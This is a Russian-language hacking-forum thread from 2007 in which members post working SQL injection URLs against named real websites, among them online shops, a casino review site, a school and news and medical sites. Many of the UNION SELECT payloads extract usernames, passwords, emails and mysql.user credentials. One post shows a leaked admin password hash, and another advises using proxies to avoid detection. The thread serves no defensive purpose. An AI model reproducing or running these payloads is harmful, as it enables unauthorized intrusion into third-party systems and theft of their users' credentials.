ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1061  
Старый 15.03.2007, 22:35
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

Цитата:
Сообщение от n1†R0x  
Код:
http://shop.turistua.com/index.php?x_id=-1+union+select+version()/*
это просто так
мм
Код:
http://shop.turistua.com/index.php?x_id=-1+union+select+concat(name,char(58),user())+from+admin/*
 
Ответить с цитированием

  #1062  
Старый 15.03.2007, 22:39
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ksander  
мм
Код:
http://shop.turistua.com/index.php?x_id=-1+union+select+concat(name,char(58),user())+from+admin/*

молодец, я как-то пропустил))
все гениальное - просто)
не как моя следующая инъекция)) пришлось качать smf, чтоб посмотреть названия колонок и таблиц в install.sql
Код:
http://www.dsrevolution.com/article.php?articleid=-1+union+select+1,2,3,4,5,6,7,concat(memberName,0x3a,passwd,0x3a,emailAddress),9,10,11,12,13,14+from+smf_members+limit+0,1/*
860±10 мемберов
login:рass:mail
 
Ответить с цитированием

  #1063  
Старый 15.03.2007, 22:48
Аватар для Grey
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Какой то магазинчик, вытянул мыло и пароль, собственно там это и нужно:

Код:
http://dvd.multi-m.ru/category/details.php?Id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(email,char(58),pwd),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users/*
Код:
http://buks.ru/book/?id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
Не забываем пользоваться проксями!
 
Ответить с цитированием

  #1064  
Старый 15.03.2007, 23:01
Аватар для Ksander
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

А ктото в казино играть любит? =)

Люблю v4 зато что большая вероятность таблици user\users\admin\admins, но терпеть немогу её за то, что если эти таблици не подходят подобрать сложно, люблю v5 зато что можно с большой вероятностью вычислить нужную таблицу, но нелюблю её за такой гемор. =)



Код:
http://www.casinoratgeber.com/index.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
 
Ответить с цитированием

  #1065  
Старый 15.03.2007, 23:17
Аватар для Helios
Helios
Постоянный
Регистрация: 14.01.2007
Сообщений: 459
Провел на форуме:
1469995

Репутация: 589
Отправить сообщение для Helios с помощью ICQ
По умолчанию

А еще лицей информационных технологий....
Куда катимся?...

Код:
http://www.lit.dp.ua/?rid=-1+union+select+1,2,3,4,5,6/*&cont=news
 
Ответить с цитированием

  #1066  
Старый 16.03.2007, 00:29
Аватар для valiko
valiko
Участник форума
Регистрация: 28.01.2007
Сообщений: 153
Провел на форуме:
1237085

Репутация: 452
По умолчанию

Код:
http://www.hrmi.lt/news.php?strid=1010&id=-4039+union+select+1,password,username,4,5,6,7,8,9+from+users/*
admin:9a997d8da071c76edc7aa3e9a89b251d

Код:
http://www.galiugyventi.lt/news.php?strid=1034&id=-1+union+select+1,password,username,4,5,6,7,8,9,0,1,2,3,4+from+users/*
он же
admin:9a997d8da071c76edc7aa3e9a89b251d

Последний раз редактировалось valiko; 16.03.2007 в 01:04..
 
Ответить с цитированием

  #1067  
Старый 16.03.2007, 01:17
Аватар для XTErner
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

Код:
http://www.apahelpcenter.org/featuredtopics/feature.php?id=-6+union+select+1,2,3,concat(username,0x3a,password),5,6,7+from+users/*
может это уже было?
 
Ответить с цитированием

  #1068  
Старый 16.03.2007, 12:46
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
http://www.stroy-shop.ru/index.php?akus=11&link_id=11&pref=3&id=-9+union+select+1,2,3,version(),5,6,7,8,9/*
=\
 
Ответить с цитированием

  #1069  
Старый 16.03.2007, 13:28
Аватар для Colkru
Colkru
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме:
865816

Репутация: 181
Отправить сообщение для Colkru с помощью ICQ
По умолчанию

Цитата:
Сообщение от XTErner  
Код:
http://www.apahelpcenter.org/featuredtopics/feature.php?id=-6+union+select+1,2,3,concat(username,0x3a,password),5,6,7+from+users/*
может это уже было?
Было, и не раз.
____________
Скули:
Какойто магазин:

Цитата:
http://www.quintensmedia.com/SHOP/category.php?ID=-1+union+select+1,2,3,version()/*
Колготки и чулки :
Цитата:
http://peppi-shop.ru/shop.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/*
И еще один шоп с 5-ой скулей))):
Цитата:
http://apex.vtc.com/display-cds.php?id=-1+union+select+1,2,3,4+from+members/*

Последний раз редактировалось Colkru; 16.03.2007 в 13:56..
 
Ответить с цитированием

  #1070  
Старый 16.03.2007, 17:15
Аватар для kamaz
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://c82.net/article.php?ID=24%20union%20select%201,2,3,4/*
Цитата:
http://www.michaelpollan.com/article.php?id=-80%20union%20select%201,2,3,4,5,6,7,8,9,0/*
Цитата:
http://www.fondsk.ru/article.php?id=-536%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21/*
Цитата:
http://www.soaw.org/new/pressrelease.php?id=-130%20union%20select%201,id,concat(email,char(58), phone),4,5,6,7,8,9,10,11,12,13%20from%20groups/*
Цитата:
http://palestra.pucp.edu.pe/index.php?id=-225%20union%20select%201,password,3,4,5,6,7,8,9,0, 11,12,13,14,15,16,17%20from%20users/*
Цитата:
http://www.dukemednews.org/news/healthtip.php?id=-6430%20union%20select%20concat(user,char(58),passw ord),2,3,4,5,6,7,8,9,0,0%20from%20mysql.user/*
Цитата:
http://magericmed.ru/modules/articles/article.php?id=29%20union%20select%201,2,3,4,5,6,A ES_DECRYPT(AES_ENCRYPT(concat(user,char(58),passwo rd),0),0),8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20mysql .user/*
__
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ